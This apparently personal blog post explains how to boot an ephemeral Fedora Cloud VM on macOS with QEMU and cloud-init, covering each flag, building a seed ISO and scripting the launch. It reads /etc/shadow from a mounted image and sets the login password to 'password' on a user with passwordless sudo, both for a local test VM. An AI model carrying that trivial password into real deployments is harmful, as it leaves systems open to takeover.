&lt;p&gt;Qemu is quite low-level compared to other software in this space, and is perhaps more commonly used via higher-level abstractions like &lt;code&gt;libvirt&lt;/code&gt;. Running it directly exposes you to many, many, many many many command line switches, which you will continually forget time and time again. But I think there&#39;s a big advantage here, for my relatively straightforward use case at least, in that it can be housed very nicely in a little stateless, portable shell script that you check in to version control. Also, I&#39;ve never had too much luck with &lt;code&gt;libvirt&lt;/code&gt; on macOS. And, most wonderfully, it saves you having to learn another configuration format on top.&lt;/p&gt;
&lt;p&gt;Here&#39;s what each of those flags means:&lt;/p&gt;
&lt;h6 id=&quot;-accel-hvf&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-accel-hvf&quot;&gt;&lt;code&gt;-accel hvf&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;Use the macOS hypervisor framework. Computer go fast!&lt;/p&gt;
&lt;h6 id=&quot;-cpu-host&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-cpu-host&quot;&gt;&lt;code&gt;-cpu host&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This uses CPU host passthrough, which means we&#39;re &lt;em&gt;not&lt;/em&gt; emulating a CPU in our guest environment. This should give us better performance than if we, say, wanted our VM to think our x86 processor was actually an aarch64 one.&lt;/p&gt;
&lt;h6 id=&quot;-m-1g&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-m-1g&quot;&gt;&lt;code&gt;-m 1G&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This sets the amount of available memory to the guest OS. So while my machine has 16GB of memory, our Linux VM won&#39;t be able to use more than 1GB. I normally set this to as close to the production server as possible.&lt;/p&gt;
&lt;h6 id=&quot;-drive-if%3Dvirtio%2Cfile%3Dfedora-cloud-base-38-1.6.x86-64.qcow2&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-drive-if%3Dvirtio%2Cfile%3Dfedora-cloud-base-38-1.6.x86-64.qcow2&quot;&gt;&lt;code&gt;-drive if=virtio,file=Fedora-Cloud-Base-38-1.6.x86_64.qcow2&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This attaches the Fedora image file we&#39;ve downloaded as the disk for the VM. To do this we use VirtIO, &lt;em&gt;another&lt;/em&gt; virtualisation standard, this time for IO devices, to attach the Fedora image. qemu takes care of all of this for us.&lt;/p&gt;
&lt;h6 id=&quot;-nic-user%2Cmodel%3Dvirtio-net-pci%2Chostfwd%3Dtcp%3A127.0.0.1%3A2222-%3A22&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-nic-user%2Cmodel%3Dvirtio-net-pci%2Chostfwd%3Dtcp%3A127.0.0.1%3A2222-%3A22&quot;&gt;&lt;code&gt;-nic user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:2222-:22&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;The &lt;code&gt;-nic&lt;/code&gt; flag enables networking, once again using VirtIO. User networking in qemu defaults to a &lt;code&gt;10.0.2.0/24&lt;/code&gt; address space, with the second IP in the network reserved as the address of the host: &lt;code&gt;10.0.2.2&lt;/code&gt;. We also use the &lt;code&gt;hostfwd&lt;/code&gt; option to forward port &lt;code&gt;2222&lt;/code&gt; on the host to port &lt;code&gt;22&lt;/code&gt; on the guest, for SSH.&lt;/p&gt;
&lt;h6 id=&quot;-snapshot&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-snapshot&quot;&gt;&lt;code&gt;-snapshot&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;Writes to temporary files instead of the disk image, meaning everything gets nuked when the guest OS is stopped. This saves us having to make another &lt;code&gt;qcow2&lt;/code&gt; file.&lt;/p&gt;
&lt;h6 id=&quot;-nographic&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-nographic&quot;&gt;&lt;code&gt;-nographic&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This disables graphical support, and instead pipes the machine&#39;s serial port to the terminal. The main gotcha here is &lt;a href=&quot;https://www.qemu.org/docs/master/system/mux-chardev.html&quot;&gt;that you have to press Ctrl + A, then X in order to quit&lt;/a&gt;. You will definitely forget this.&lt;/p&gt;
&lt;p&gt;This is all working great, and now we get a login prompt for our machine-in-a-machine. Wait, a login? Uh oh:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Fedora Linux 38 (Cloud Edition)
Kernel 6.2.9-300.fc38.x86_64 on an x86_64 (ttyS0)

eth0: 10.0.2.15 fec0::7b27:4767:382e:dafc
localhost login:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This can be a tricky moment. How are you supposed to log in? What&#39;s the password going to be? You can try &lt;code&gt;fedora&lt;/code&gt; here, or maybe &lt;code&gt;root&lt;/code&gt; - but unfortunately you&#39;re not getting past this screen (for now).&lt;/p&gt;
&lt;p&gt;Instead of Googling the answer, we can be indulgent and poke around a bit first. Our image file is in a &lt;code&gt;qcow2&lt;/code&gt; format, which is the default for qemu. I don&#39;t know how to work directly with that on macOS, but luckily we also have &lt;code&gt;qemu-img&lt;/code&gt; which can convert to a more common &lt;code&gt;img&lt;/code&gt; format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img convert -f qcow2 -O raw Fedora-Cloud-Base-38-1.6.x86_64.qcow2 fedora.img
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;fedora.img&lt;/code&gt; file contains multiple partitions, one of which contains a &lt;a href=&quot;https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard&quot;&gt;standard Linux directory layout&lt;/a&gt;. If we mount that partition (aside: getting macOS to recognise &lt;code&gt;ext4&lt;/code&gt; and &lt;code&gt;btrfs&lt;/code&gt; filesystems is a bit of a faff that I won&#39;t cover here) we can check out the filesystem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# /etc/shadow contains information about a system&#39;s users
$ cat /etc/shadow | grep root
root:!locked::0:99999:7:::
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As expected, the &lt;code&gt;root&lt;/code&gt; user is locked (thanks to the &lt;code&gt;!&lt;/code&gt;) and so we can&#39;t log in with a password.&lt;/p&gt;
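&lt;p&gt;If you want to check more than one entry, the same idea can be sketched as a small shell function. This is a rough illustration rather than a proper parser: &lt;code&gt;shadow_status&lt;/code&gt; is a name I&#39;ve made up, and it only looks at the second colon-separated field, where a leading &lt;code&gt;!&lt;/code&gt; or &lt;code&gt;*&lt;/code&gt; means no password will ever match.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/sh
# Hypothetical helper: classify a single /etc/shadow entry.
# Field 2 holds the password hash. A leading "!" or "*" can never match
# a real password, and an empty field means no password is required.
shadow_status() {
  field=$(printf '%s\n' "$1" | cut -d: -f2)
  case "$field" in
    '!'*|'*'*) echo locked ;;
    '') echo empty ;;
    *) echo hashed ;;
  esac
}

shadow_status 'root:!locked::0:99999:7:::'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For the &lt;code&gt;root&lt;/code&gt; entry above this prints &lt;code&gt;locked&lt;/code&gt;.&lt;/p&gt;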
&lt;p&gt;The next bit requires a bit of background/circular knowledge (you need to know where to check for &lt;code&gt;cloud-init&lt;/code&gt;, which you wouldn&#39;t know to do unless you knew about &lt;code&gt;cloud-init&lt;/code&gt;) but we can also check that there&#39;s a file at &lt;code&gt;/etc/cloud/cloud.cfg&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat /etc/cloud/cloud.cfg | wc -l
108
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This suggests our Fedora Cloud distribution is indeed using a tool called &lt;code&gt;cloud-init&lt;/code&gt; to handle its configuration, including users and groups. This isn&#39;t a surprise: it&#39;s pretty much the de facto standard for cloud images. The documentation for &lt;code&gt;cloud-init&lt;/code&gt; suggests that each distribution sets up a default user, which we can check:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat /etc/cloud/cloud.cfg | grep &#39;default_user:&#39; -A 6
   default_user:
     name: fedora
     lock_passwd: True
     gecos: fedora Cloud User
     groups: [wheel, adm, systemd-journal]
     sudo: [&amp;quot;ALL=(ALL) NOPASSWD:ALL&amp;quot;]
     shell: /bin/bash
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, by the time we run this image in a VM, &lt;code&gt;cloud-init&lt;/code&gt; has done its magic and we &lt;em&gt;do&lt;/em&gt; have a &lt;code&gt;fedora&lt;/code&gt; user - but it doesn&#39;t have a password specified by default. So we can&#39;t log in (yet). We need to further configure our VM instance using &lt;code&gt;cloud-init&lt;/code&gt;. The &lt;a href=&quot;https://cloudinit.readthedocs.io/en/latest/tutorial/qemu.html&quot;&gt;documentation has a pretty good tutorial&lt;/a&gt; to get up and running, which I&#39;ll mostly be recapping here.&lt;/p&gt;
&lt;p&gt;In short: we need to feed it some YAML. Of course we do, because you can&#39;t configure something intended for the cloud without &lt;em&gt;at least&lt;/em&gt; some YAML.&lt;/p&gt;
&lt;p&gt;We&#39;ll set up a directory and the relevant files:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ mkdir cloud-init &amp;amp;&amp;amp; touch cloud-init/{user,meta,vendor}-data
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then populate our &lt;code&gt;user-data&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat &amp;lt;&amp;lt; EOF &amp;gt; ./cloud-init/user-data
#cloud-config
password: password
chpasswd:
  expire: False

EOF
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don&#39;t worry about the &lt;code&gt;meta-data&lt;/code&gt; and &lt;code&gt;vendor-data&lt;/code&gt; files, but having them exist (even if empty) will speed up the boot time of the VM.&lt;/p&gt;
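&lt;p&gt;One easy mistake is dropping the &lt;code&gt;#cloud-config&lt;/code&gt; header, in which case &lt;code&gt;cloud-init&lt;/code&gt; won&#39;t treat the file as cloud-config at all. A minimal pre-flight check might look like this. &lt;code&gt;check_user_data&lt;/code&gt; is a hypothetical helper of my own, not something &lt;code&gt;cloud-init&lt;/code&gt; ships, and it only inspects the first line rather than validating the YAML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/sh
# Hypothetical pre-flight check, not part of cloud-init itself.
# cloud-init only parses user-data as cloud-config when the first line
# starts with "#cloud-config", so catch a missing header before booting.
check_user_data() {
  if [ ! -f "$1" ]; then
    echo "no such file: $1"
    return 1
  fi
  case "$(head -n 1 "$1")" in
    '#cloud-config'*) echo "ok" ;;
    *) echo "missing #cloud-config header"; return 1 ;;
  esac
}

# Only run the check if the file from the previous step exists.
if [ -f ./cloud-init/user-data ]; then
  check_user_data ./cloud-init/user-data
fi
&lt;/code&gt;&lt;/pre&gt;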
&lt;p&gt;The next step is to get the operating system aware of these files. With &lt;a href=&quot;https://cloudinit.readthedocs.io/en/latest/reference/datasources/nocloud.html&quot;&gt;cloud-init&#39;s NoCloud data source&lt;/a&gt;, that&#39;s done by mounting a &lt;code&gt;CIDATA&lt;/code&gt; volume or using a webserver. The latter is closer to how real cloud servers operate, but that means having a webserver running in another tab, and that feels like more faff when it comes to scripting all this.&lt;/p&gt;
&lt;p&gt;Instead, we can make a CD image with &lt;code&gt;xorriso&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ xorriso -outdev ./nocloud.iso &#92;
  -joliet on &#92;
  -blank as_needed &#92;
  -map ./cloud-init/ / &#92;
  -volid CIDATA
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And return to &lt;code&gt;qemu-system-x86_64&lt;/code&gt;, mounting our &lt;code&gt;nocloud.iso&lt;/code&gt; as another drive:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-system-x86_64 &#92;
  -accel hvf &#92;
  -cpu host &#92;
  -m 1G &#92;
  -drive if=virtio,file=&amp;quot;Fedora-Cloud-Base-38-1.6.x86_64.qcow2&amp;quot; &#92;
  -drive if=virtio,file=&amp;quot;nocloud.iso&amp;quot;,index=2,media=cdrom &#92;
  -nic user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:2222-:22 &#92;
  -snapshot &#92;
  -nographic
&lt;/code&gt;&lt;/pre&gt;
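&lt;p&gt;Since the whole point is to keep this in a little shell script, here&#39;s a rough sketch of how the command above might be wrapped. The names &lt;code&gt;IMAGE&lt;/code&gt;, &lt;code&gt;SEED&lt;/code&gt;, &lt;code&gt;SSH_PORT&lt;/code&gt;, &lt;code&gt;DRY_RUN&lt;/code&gt; and &lt;code&gt;run_vm&lt;/code&gt; are all made up for this example, and it defaults to printing the command rather than running it, so you can eyeball the flags first:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/sh
# Hypothetical wrapper around the qemu command above. The variable and
# function names are illustrative; the defaults mirror the flags in the
# article.
IMAGE="${IMAGE:-Fedora-Cloud-Base-38-1.6.x86_64.qcow2}"
SEED="${SEED:-nocloud.iso}"
SSH_PORT="${SSH_PORT:-2222}"

run_vm() {
  # Build the full command as positional parameters so that each
  # argument stays a single word, even if a path contains spaces.
  set -- qemu-system-x86_64 \
    -accel hvf \
    -cpu host \
    -m 1G \
    -drive "if=virtio,file=${IMAGE}" \
    -drive "if=virtio,file=${SEED},index=2,media=cdrom" \
    -nic "user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:${SSH_PORT}-:22" \
    -snapshot \
    -nographic

  # DRY_RUN defaults to 1: print the command instead of booting the VM.
  if [ "${DRY_RUN:-1}" = "1" ]; then
    printf '%s\n' "$*"
  else
    "$@"
  fi
}

run_vm
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Setting &lt;code&gt;DRY_RUN=0&lt;/code&gt; boots the VM for real, and overriding &lt;code&gt;SSH_PORT&lt;/code&gt; is handy if something else is already listening on &lt;code&gt;2222&lt;/code&gt;.&lt;/p&gt;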
&lt;p&gt;Whew! That&#39;s a lot. But, once that machine boots, we can log in as &lt;code&gt;fedora&lt;/code&gt; and use our brand new password of &lt;code&gt;password&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Fedora Linux 38 (Cloud Edition)
Kernel 6.2.9-300.fc38.x86_64 on an x86_64 (ttyS0)

eth0: 10.0.2.15 fec0::5962:c9cc:4f1f:45fb
localhost login: fedora
Password:
[fedora@localhost ~]$ hostnamectl
     Static hostname: localhost
           Icon name: computer-vm
             Chassis: vm 🖴
          Machine ID: d6416aa014fa49268ab214be6ee827d9
             Boot ID: e6b3da91a607484d8927910580cd9a6c
      Virtualization: qemu
    Operating System: Fedora Linux 38 (Cloud Edition)
         CPE OS Name: cpe:/o:fedoraproject:fedora:38
      OS Support End: Tue 2024-05-14
OS Support Remaining: 10month 3w 1d
              Kernel: Linux 6.2.9-300.fc38.x86_64
        Architecture: x86-64
     Hardware Vendor: QEMU
      Hardware Model: Standard PC _i440FX + PIIX, 1996_
    Firmware Version: rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org
       Firmware Date: Tue 2014-04-01
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Perfect! From here there&#39;s a lot you can do that your regular containerised environment just can&#39;t reach, from exploring &lt;code&gt;systemd&lt;/code&gt; to playing around with &lt;code&gt;cgroups&lt;/code&gt; or poking around with some complicated &lt;code&gt;iptables&lt;/code&gt; commands. It&#39;s also probably worth properly setting up SSH and customising a proper user - &lt;a href=&quot;https://cloudinit.readthedocs.io/en/latest/reference/examples.html&quot;&gt;the documentation will set you off down that road&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Also: it&#39;s just cool to be able to spin up a Linux instance every now and then.&lt;/p&gt;
</content>
  </entry>
</feed>